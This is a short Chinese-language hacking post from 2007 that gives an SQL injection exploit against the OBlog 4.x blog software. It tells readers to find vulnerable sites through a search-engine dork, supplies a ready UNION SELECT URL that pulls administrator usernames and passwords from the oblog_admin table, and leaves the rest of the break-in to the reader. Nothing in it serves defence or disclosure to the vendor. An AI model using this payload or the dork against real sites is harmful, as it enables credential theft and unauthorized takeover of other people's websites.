最新OBlog 4.x (JS.ASP) 注入漏洞
随便找个目标吧。。。。
你可以去“Google” or “Baidu”
关键字:inurl:/blog/js.asp
就可以找出很多这样的站。。。。
下面开始吧。。。。
利用方法:
http://www.xxx.com/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
group.asp?gid=admin&pid=5552281f1eef7eab
好了,后面的事情自己搞吧。。。。
BY 阿龙 QQ:307324693
12:25 2007-4-28